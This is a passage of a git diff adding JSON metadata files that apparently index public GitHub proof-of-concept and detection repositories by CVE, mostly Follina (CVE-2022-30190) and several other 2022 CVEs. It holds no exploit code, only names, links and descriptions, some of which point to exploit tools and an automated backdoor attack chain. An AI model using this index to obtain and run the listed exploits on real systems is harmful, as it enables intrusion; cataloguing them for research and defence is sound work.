"visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 507979018, + "name": "go_follina", + "full_name": "Lucaskrell\/go_follina", + "owner": { + "login": "Lucaskrell", + "id": 61007904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007904?v=4", + "html_url": "https:\/\/github.com\/Lucaskrell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lucaskrell\/go_follina", + "description": "Follina (CVE-2022-30190) proof-of-concept", + "fork": false, + "created_at": "2022-06-27T16:14:34Z", + "updated_at": "2023-07-26T14:55:32Z", + "pushed_at": "2023-02-21T19:21:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 508614565, + "name": "CVE-2022-30190_EXP_PowerPoint", + "full_name": "Gra3s\/CVE-2022-30190_EXP_PowerPoint", + "owner": { + "login": "Gra3s", + "id": 76804515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76804515?v=4", + "html_url": "https:\/\/github.com\/Gra3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gra3s\/CVE-2022-30190_EXP_PowerPoint", + "description": "This is exploit of CVE-2022-30190 on PowerPoint.", + "fork": false, + "created_at": "2022-06-29T08:48:12Z", + "updated_at": "2024-08-12T20:24:36Z", + "pushed_at": "2023-03-23T03:18:46Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 516257756, + "name": "Follina-MSDT-Vulnerability-CVE-2022-30190-", + "full_name": "EkamSinghWalia\/Follina-MSDT-Vulnerability-CVE-2022-30190-", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Follina-MSDT-Vulnerability-CVE-2022-30190-", + "description": "Detection and Remediation of the Follina MSDT Vulnerability (CVE-2022-30190)", + "fork": false, + "created_at": "2022-07-21T06:49:44Z", + "updated_at": "2024-07-04T03:35:20Z", + "pushed_at": "2022-07-22T15:00:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520189959, + "name": "five-nights-at-follina-s", + "full_name": "jeffreybxu\/five-nights-at-follina-s", + "owner": { + "login": "jeffreybxu", + "id": 19352690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19352690?v=4", + "html_url": "https:\/\/github.com\/jeffreybxu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeffreybxu\/five-nights-at-follina-s", + "description": "A Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.", + "fork": false, + "created_at": "2022-08-01T16:47:50Z", + "updated_at": "2024-09-10T23:02:11Z", + "pushed_at": "2022-08-05T16:16:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 525371313, + "name": "Follina-CVE-2022-30190-PoC-sample", + "full_name": "Captain404\/Follina-CVE-2022-30190-PoC-sample", + "owner": { + "login": "Captain404", + "id": 58698256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58698256?v=4", + "html_url": "https:\/\/github.com\/Captain404", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Captain404\/Follina-CVE-2022-30190-PoC-sample", + "description": "Educational Follina PoC Tool", + "fork": false, + "created_at": "2022-08-16T12:32:33Z", + "updated_at": "2022-08-16T12:34:43Z", + "pushed_at": "2022-08-16T12:48:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 537107690, + "name": "CVE-2022-30190", + "full_name": "winstxnhdw\/CVE-2022-30190", + "owner": { + "login": "winstxnhdw", + "id": 56998716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56998716?v=4", + "html_url": "https:\/\/github.com\/winstxnhdw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/winstxnhdw\/CVE-2022-30190", + "description": "A proof of concept for CVE-2022-30190 (Follina).", + "fork": false, + "created_at": "2022-09-15T16:12:57Z", + "updated_at": "2023-08-29T16:29:42Z", + "pushed_at": "2024-03-01T16:26:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40444", + "follina", + "msdt", + "remote-code-execution", + "trojan" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 546628423, + "name": "Follina-attack-CVE-2022-30190-", + "full_name": "Imeneallouche\/Follina-attack-CVE-2022-30190-", + "owner": { + "login": "Imeneallouche", + "id": 89279264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89279264?v=4", + "html_url": "https:\/\/github.com\/Imeneallouche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Imeneallouche\/Follina-attack-CVE-2022-30190-", + "description": "this is a demo attack of FOLLINA exploit , a vulnerability that has been discovered in May 2022 and stood unpatched until June 2022", + "fork": false, + "created_at": "2022-10-06T11:41:43Z", + "updated_at": "2022-10-06T15:42:31Z", + "pushed_at": "2022-10-06T21:22:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564441217, + "name": "CVE-Smackdown", + "full_name": "mattjmillner\/CVE-Smackdown", + "owner": { + "login": "mattjmillner", + "id": 56142300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56142300?v=4", + "html_url": "https:\/\/github.com\/mattjmillner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mattjmillner\/CVE-Smackdown", + "description": "Implementation of CVE-2022-30190 in C", + "fork": false, + "created_at": "2022-11-10T18:15:57Z", + "updated_at": "2022-11-10T18:15:57Z", + "pushed_at": "2022-11-10T18:59:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 568186569, + "name": "FollinaXploit", + "full_name": "0xAbbarhSF\/FollinaXploit", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/FollinaXploit", + "description": "A Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.", + "fork": false, + "created_at": "2022-11-19T18:09:47Z", + "updated_at": "2024-08-12T20:28:26Z", + "pushed_at": "2022-11-19T18:41:57Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582283998, + "name": "Cve-2022-30190", + "full_name": "michealadams30\/Cve-2022-30190", + "owner": { + "login": "michealadams30", + "id": 113975732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4", + "html_url": "https:\/\/github.com\/michealadams30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michealadams30\/Cve-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-12-26T10:29:46Z", + "updated_at": "2023-07-26T14:55:23Z", + "pushed_at": "2022-12-26T10:32:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 583330434, + "name": "Enterprise-Cybersecurity", + "full_name": "melting0256\/Enterprise-Cybersecurity", + "owner": { + "login": "melting0256", + "id": 103974176, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103974176?v=4", + "html_url": "https:\/\/github.com\/melting0256", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/melting0256\/Enterprise-Cybersecurity", + "description": "CVE-2022-30190(follina)", + "fork": false, + "created_at": "2022-12-29T13:06:16Z", + "updated_at": "2023-07-26T14:55:21Z", + "pushed_at": "2022-12-29T13:08:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 601379517, + "name": "CVE-2022-30190", + "full_name": "yrkuo\/CVE-2022-30190", + "owner": { + "login": "yrkuo", + "id": 39819798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39819798?v=4", + "html_url": "https:\/\/github.com\/yrkuo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yrkuo\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2023-02-13T23:58:58Z", + "updated_at": "2023-12-25T12:02:49Z", + "pushed_at": "2023-02-14T01:29:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 613736106, + "name": "FOLLINA-CVE-2022-30190", + "full_name": "ToxicEnvelope\/FOLLINA-CVE-2022-30190", + "owner": { + "login": "ToxicEnvelope", + "id": 23465872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23465872?v=4", + "html_url": "https:\/\/github.com\/ToxicEnvelope", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ToxicEnvelope\/FOLLINA-CVE-2022-30190", + "description": "Implementation of FOLLINA-CVE-2022-30190", + "fork": false, + "created_at": "2023-03-14T07:00:47Z", + "updated_at": "2024-06-20T18:44:33Z", + "pushed_at": "2023-08-27T09:39:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 635211834, + "name": "CVE-2022-30190", + "full_name": "hycheng15\/CVE-2022-30190", + "owner": { + "login": "hycheng15", + "id": 74200918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74200918?v=4", + "html_url": "https:\/\/github.com\/hycheng15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hycheng15\/CVE-2022-30190", + "description": "An exploitation of CVE-2022-30190 (Follina)", + "fork": false, + "created_at": "2023-05-02T07:56:28Z", + "updated_at": "2023-07-26T14:55:29Z", + "pushed_at": "2023-11-14T10:19:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640555631, + "name": "CVE-2022-30190", + "full_name": "aminetitrofine\/CVE-2022-30190", + "owner": { + "login": "aminetitrofine", + "id": 70074517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074517?v=4", + "html_url": "https:\/\/github.com\/aminetitrofine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aminetitrofine\/CVE-2022-30190", + "description": "Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability that has recently been discovered. It’s a high-severity vulnerability that hackers can leverage for remote code execution (RCE) attacks.", + "fork": false, + "created_at": "2023-05-14T13:38:43Z", + "updated_at": "2024-10-09T04:32:05Z", + "pushed_at": "2023-05-14T13:45:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667473352, + "name": "Follina_MSDT_CVE-2022-30190", + "full_name": "Muhammad-Ali007\/Follina_MSDT_CVE-2022-30190", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/Follina_MSDT_CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2023-07-17T15:24:54Z", + "updated_at": "2024-04-20T01:38:09Z", + "pushed_at": "2023-07-18T20:13:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 724428602, + "name": "AmzWord", + "full_name": "Jump-Wang-111\/AmzWord", + "owner": { + "login": "Jump-Wang-111", + "id": 69379868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69379868?v=4", + "html_url": "https:\/\/github.com\/Jump-Wang-111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jump-Wang-111\/AmzWord", + "description": "An automated attack chain based on CVE-2022-30190, 163 email backdoor, and image steganography.", + "fork": false, + "created_at": "2023-11-28T03:47:32Z", + "updated_at": "2024-09-04T02:59:22Z", + "pushed_at": "2023-11-28T10:16:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758899750, + "name": "ZipScan", + "full_name": "shri142\/ZipScan", + "owner": { + "login": "shri142", + "id": 81535914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81535914?v=4", + "html_url": "https:\/\/github.com\/shri142", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shri142\/ZipScan", + "description": "A tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)", + "fork": false, + "created_at": "2024-02-17T12:10:12Z", + "updated_at": "2024-02-24T17:59:28Z", + "pushed_at": "2024-02-24T17:59:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784462275, + "name": "CVE-2022-30190", + "full_name": "alien-keric\/CVE-2022-30190", + "owner": { + "login": "alien-keric", + "id": 102582785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102582785?v=4", + "html_url": "https:\/\/github.com\/alien-keric", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alien-keric\/CVE-2022-30190", + "description": "The script is from https:\/\/github.com\/JohnHammond\/msdt-follina, just make it simple for me to use it and this script aim at generating the payload for more information refer the johnn hammond link", + "fork": false, + "created_at": "2024-04-09T22:40:09Z", + "updated_at": "2024-04-10T01:26:23Z", + "pushed_at": "2024-04-09T22:41:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831490675, + "name": "Follina-CVE-2022-30190-Sample", + "full_name": "ethicalblue\/Follina-CVE-2022-30190-Sample", + "owner": { + "login": "ethicalblue", + "id": 82314652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82314652?v=4", + "html_url": "https:\/\/github.com\/ethicalblue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethicalblue\/Follina-CVE-2022-30190-Sample", + "description": "Educational exploit for CVE-2022-30190", + "fork": false, + "created_at": "2024-07-20T17:50:48Z", + "updated_at": "2024-07-20T19:56:33Z", + "pushed_at": "2024-07-20T18:23:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30203.json b/2022/CVE-2022-30203.json new file mode 100644 index 0000000000..3a6d1c4eb5 --- /dev/null +++ b/2022/CVE-2022-30203.json @@ -0,0 +1,44 @@ +[ + { + "id": 811928581, + "name": "dubiousdisk", + "full_name": "Wack0\/dubiousdisk", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/dubiousdisk", + "description": "The Porygon-Z that's super effective against Secure Boot! (CVE-2022-30203, CVE-2023-21560, CVE-2023-28269, CVE-2023-28249, and more...)", + "fork": false, + "created_at": "2024-06-07T15:25:33Z", + "updated_at": "2024-10-09T02:12:28Z", + "pushed_at": "2024-06-07T15:26:02Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitlocker", + "cve-2022-30203", + "cve-2023-21560", + "cve-2023-28249", + "cve-2023-28269", + "secure-boot", + "uefi", + "vulnerability", + "windows-boot", + "writeup" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30206.json b/2022/CVE-2022-30206.json new file mode 100644 index 0000000000..837873b412 --- /dev/null +++ b/2022/CVE-2022-30206.json @@ -0,0 +1,73 @@ +[ + { + "id": 535010646, + "name": "CVE-2022-30206", + "full_name": "MagicPwnrin\/CVE-2022-30206", + "owner": { + "login": "MagicPwnrin", + "id": 98268685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98268685?v=4", + "html_url": "https:\/\/github.com\/MagicPwnrin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagicPwnrin\/CVE-2022-30206", + "description": "Exploit for CVE-2022-30206", + "fork": false, + "created_at": "2022-09-10T13:44:40Z", + "updated_at": "2024-08-12T20:26:54Z", + "pushed_at": "2022-09-25T12:36:09Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 75, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 541754624, + "name": "CVE-2022-30206", + "full_name": "Malwareman007\/CVE-2022-30206", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-30206", + "description": "A POC of CVE-2022-30206", + "fork": false, + "created_at": "2022-09-26T19:38:24Z", + "updated_at": "2024-08-12T20:27:21Z", + "pushed_at": "2022-09-26T19:42:57Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-30206", + "microsoft", + "print-spooler", + "privileges", + "security", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 1, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30216.json b/2022/CVE-2022-30216.json new file mode 100644 index 0000000000..93943bf8ec --- /dev/null +++ b/2022/CVE-2022-30216.json @@ -0,0 +1,33 @@ +[ + { + "id": 513217739, + "name": "CVE-2022-30216", + "full_name": "corelight\/CVE-2022-30216", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-30216", + "description": "Zeek detection logic for CVE-2022-30216.", + "fork": false, + "created_at": "2022-07-12T16:35:37Z", + "updated_at": "2024-08-12T20:25:01Z", + "pushed_at": "2023-04-04T20:11:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30292.json b/2022/CVE-2022-30292.json new file mode 100644 index 0000000000..5d5562b68e --- /dev/null +++ b/2022/CVE-2022-30292.json @@ -0,0 +1,33 @@ +[ + { + "id": 490781035, + "name": "CVE-2022-30292", + "full_name": "sprushed\/CVE-2022-30292", + "owner": { + "login": "sprushed", + "id": 96259690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96259690?v=4", + "html_url": "https:\/\/github.com\/sprushed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sprushed\/CVE-2022-30292", + "description": null, + "fork": false, + "created_at": "2022-05-10T16:39:00Z", + "updated_at": "2022-05-11T17:43:52Z", + "pushed_at": "2022-05-10T17:13:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30333.json b/2022/CVE-2022-30333.json new file mode 100644 index 0000000000..2a9fc85b94 --- /dev/null +++ b/2022/CVE-2022-30333.json @@ -0,0 +1,157 @@ +[ + { + "id": 510563141, + "name": "CVE-2022-30333-PoC", + "full_name": "TheL1ghtVn\/CVE-2022-30333-PoC", + "owner": { + "login": "TheL1ghtVn", + "id": 89027345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89027345?v=4", + "html_url": "https:\/\/github.com\/TheL1ghtVn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheL1ghtVn\/CVE-2022-30333-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-05T02:35:12Z", + "updated_at": "2023-07-06T12:20:38Z", + "pushed_at": "2022-07-05T02:58:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514420724, + "name": "unrar-cve-2022-30333-poc", + "full_name": "rbowes-r7\/unrar-cve-2022-30333-poc", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/unrar-cve-2022-30333-poc", + "description": null, + "fork": false, + "created_at": "2022-07-15T22:29:42Z", + "updated_at": "2024-08-12T20:25:08Z", + "pushed_at": "2022-07-18T16:16:37Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 516568409, + "name": "CVE-2022-30333", + "full_name": "J0hnbX\/CVE-2022-30333", + "owner": { + "login": "J0hnbX", + "id": 98451016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98451016?v=4", + "html_url": "https:\/\/github.com\/J0hnbX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J0hnbX\/CVE-2022-30333", + "description": null, + "fork": false, + "created_at": "2022-07-22T01:14:29Z", + "updated_at": "2022-10-26T01:11:38Z", + "pushed_at": "2022-07-22T01:14:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 518072916, + "name": "Zimbra-CVE-2022-30333", + "full_name": "aslitsecurity\/Zimbra-CVE-2022-30333", + "owner": { + "login": "aslitsecurity", + "id": 9478055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478055?v=4", + "html_url": "https:\/\/github.com\/aslitsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aslitsecurity\/Zimbra-CVE-2022-30333", + "description": "Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC.", + "fork": false, + "created_at": "2022-07-26T13:28:12Z", + "updated_at": "2024-08-12T20:25:30Z", + "pushed_at": "2022-07-26T13:42:50Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812954079, + "name": "cve-2022-30333_online_rar_extracor", + "full_name": "paradox0909\/cve-2022-30333_online_rar_extracor", + "owner": { + "login": "paradox0909", + "id": 85692552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85692552?v=4", + "html_url": "https:\/\/github.com\/paradox0909", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paradox0909\/cve-2022-30333_online_rar_extracor", + "description": null, + "fork": false, + "created_at": "2024-06-10T08:17:50Z", + "updated_at": "2024-06-10T08:20:11Z", + "pushed_at": "2024-06-10T08:20:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30489.json b/2022/CVE-2022-30489.json new file mode 100644 index 0000000000..f5ffed7b0c --- /dev/null +++ b/2022/CVE-2022-30489.json @@ -0,0 +1,33 @@ +[ + { + "id": 489169320, + "name": "XSS-CVE-2022-30489", + "full_name": "badboycxcc\/XSS-CVE-2022-30489", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/XSS-CVE-2022-30489", + "description": null, + "fork": false, + "created_at": "2022-05-06T00:47:51Z", + "updated_at": "2024-08-12T20:23:00Z", + "pushed_at": "2022-05-14T06:20:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30507.json b/2022/CVE-2022-30507.json new file mode 100644 index 0000000000..02f152ca99 --- /dev/null +++ b/2022/CVE-2022-30507.json @@ -0,0 +1,33 @@ +[ + { + "id": 514621957, + "name": "CVE-2022-30507-PoC", + "full_name": "yosef0x01\/CVE-2022-30507-PoC", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2022-30507-PoC", + "description": "PoC for Arbitrary Code Execution in Notable", + "fork": false, + "created_at": "2022-07-16T15:55:28Z", + "updated_at": "2024-06-21T00:10:12Z", + "pushed_at": "2023-03-13T03:30:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, 